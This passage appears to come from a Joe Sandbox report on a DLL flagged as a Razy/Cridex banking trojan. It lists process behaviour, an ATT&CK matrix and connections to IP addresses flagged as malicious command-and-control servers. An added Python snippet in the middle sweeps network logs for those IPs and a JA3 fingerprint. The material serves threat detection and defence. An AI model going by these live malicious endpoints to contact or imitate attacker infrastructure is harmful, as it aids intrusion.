                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E538B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E5347C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E60BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E60B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E60B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D7A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E5063A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1193139595.0000000001BE0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1193661861.00000000033E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 112 | Process Injection 112 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rundll32 1 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Configuration Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 23 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      (behavior graph image not included in this rendering)

                      Screenshots

                      (screenshot thumbnails not included in this rendering)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label | Link
                      SecuriteInfo.com.Variant.Razy.980776.5008.dll | 20% | ReversingLabs | Win32.Worm.Cridex |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label | Link

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      https://192.46.210.220/ | true | URL Reputation: safe | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation

                      Contacted IPs


                      Public

                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      45.77.0.96 | unknown | United States | | 20473 | AS-CHOOPAUS | true
                      185.56.219.47 | unknown | Italy | | 202675 | KELIWEBIT | true
                      192.46.210.220 | unknown | United States | | 5501 | FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe | true
                      143.244.140.214 | unknown | United States | | 174 | COGENT-174US | true

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:510696
                      Start date:28.10.2021
                      Start time:05:05:01
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:SecuriteInfo.com.Variant.Razy.980776.5008.1370 (renamed file extension from 1370 to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.bank.troj.evad.winDLL@11/2@0/4
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 14.3% (good quality ratio 14.3%)
                      • Quality average: 79.7%
                      • Quality standard deviation: 15.8%
                      HCA Information:
                      • Successful, ratio: 65%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.50.102.62, 20.189.173.22, 20.42.73.29, 23.211.6.115, 52.168.117.173, 20.189.173.21, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 40.91.112.76, 20.54.110.249, 40.112.88.60
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, onedsblobprdcus17.centralus.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/510696/sample/SecuriteInfo.com.Variant.Razy.980776.5008.dll

                      Simulations

                      Behavior and APIs

Time | Type | Description
05:07:00 | API Interceptor | 186x Sleep call for process: rundll32.exe modified
05:07:01 | API Interceptor | 185x Sleep call for process: loaddll32.exe modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | Detection
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.19803.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.19803.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.19803.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 185.56.219.47
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.19803.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 45.77.0.96

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.19803.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 192.46.210.220
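The IP, ASN and JA3 context tables above are pivots for hunting: 45.77.0.96 (AS-CHOOPAUS) and 185.56.219.47 (KELIWEBIT) recur across the same twenty Razy-tagged samples, and the JA3 hash is the TLS client fingerprint those samples produced when talking to 192.46.210.220. The following Python is an added example, not part of the Joe Sandbox report, that sweeps Zeek-style conn.log and ssl.log lines for exactly those indicators. The log lines are constructed for the example (13.89.179.12 is taken from the report's whitelist as a benign control row), and the tab-separated column order is an assumption about the log export, not something the report states.

```python
"""Sweep Zeek-style conn.log / ssl.log lines for the network IOCs listed in this report."""
import csv
import io
from typing import Dict, List

# Indicators exactly as they appear in the report's IPs / ASN / JA3 context tables.
IOC_IPS = {"45.77.0.96", "185.56.219.47", "192.46.210.220"}
IOC_JA3 = {"51c64c77e60f3980eea90869b68c58a8"}

# Assumed column order of the tab-separated export (Zeek field names).
CONN_FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto"]
SSL_FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "ja3"]

# Constructed sample logs, not taken from the report. 13.89.179.12 is in the
# report's whitelist and serves as a benign control; the non-matching JA3 is a dummy.
SAMPLE_CONN_LOG = (
    "1634288820.1\tCx1\t10.0.0.5\t49812\t45.77.0.96\t443\ttcp\n"
    "1634288821.4\tCx2\t10.0.0.5\t49813\t13.89.179.12\t443\ttcp\n"
    "1634288825.9\tCx3\t10.0.0.7\t49901\t185.56.219.47\t8443\ttcp\n"
)
SAMPLE_SSL_LOG = (
    "1634288820.2\tCx1\t10.0.0.5\t49812\t45.77.0.96\t443\t51c64c77e60f3980eea90869b68c58a8\n"
    "1634288821.5\tCx2\t10.0.0.5\t49813\t13.89.179.12\t443\tdeadbeefdeadbeefdeadbeefdeadbeef\n"
)


def parse_tsv(text: str, fields: List[str]) -> List[Dict[str, str]]:
    """Parse tab-separated log lines into dicts keyed by the given field names."""
    reader = csv.reader(io.StringIO(text), delimiter="\t")
    return [dict(zip(fields, row)) for row in reader if row]


def find_iocs(conn_log: str, ssl_log: str) -> List[Dict[str, str]]:
    """Return one hit per (connection, indicator) pair.

    Destination-IP matches come from conn.log; JA3 matches come from ssl.log and
    are reported on their own so that a fingerprint hit against a not-yet-listed
    destination still surfaces.
    """
    hits: List[Dict[str, str]] = []
    for rec in parse_tsv(conn_log, CONN_FIELDS):
        if rec["id.resp_h"] in IOC_IPS:
            hits.append({"uid": rec["uid"], "type": "ip",
                         "value": rec["id.resp_h"], "dst_port": rec["id.resp_p"]})
    for rec in parse_tsv(ssl_log, SSL_FIELDS):
        if rec["ja3"] in IOC_JA3:
            hits.append({"uid": rec["uid"], "type": "ja3",
                         "value": rec["ja3"], "dst_port": rec["id.resp_p"]})
    return hits


if __name__ == "__main__":
    for hit in find_iocs(SAMPLE_CONN_LOG, SAMPLE_SSL_LOG):
        print(hit)
```

Treat the two indicator classes differently when triaging the output. A JA3 hash fingerprints the TLS client stack rather than the malware: code running inside rundll32.exe normally negotiates TLS through the Windows stack, so the same hash will also appear in benign traffic from the host unless the sample ships its own TLS library. A JA3 hit is therefore a reason to look at the destination and the originating process; the destination-IP hits are the stronger signal on their own.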

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61157
                                                                                                      Entropy (8bit):7.995991509218449
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                      MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                      SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                      SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                      SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):326
                                                                                                      Entropy (8bit):3.108423439276625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKdjOdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:pg2kPlE99SNxAhUefit
                                                                                                      MD5:E66FF5BA4EFD24F9FB241ADEEBFFCED5
                                                                                                      SHA1:7F1B57D2AEAA051405987A55C4E4A720E31B7875
                                                                                                      SHA-256:ACD77DBD6ABD455C0DF9AA888F6C460BC2DB991FABB31D45EFC72177A6A652F0
                                                                                                      SHA-512:231851698264F234D485412E5C62B5DB1FE9F25F4D25DE3025A7BCB4126EC4E4F55026BAE0F64D9CB36624ED058E04A42F90DEBC51E1422F4D16B300E7708226
                                                                                                      Malicious:false
                                                                                                      Preview: p...... ........Y..>....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
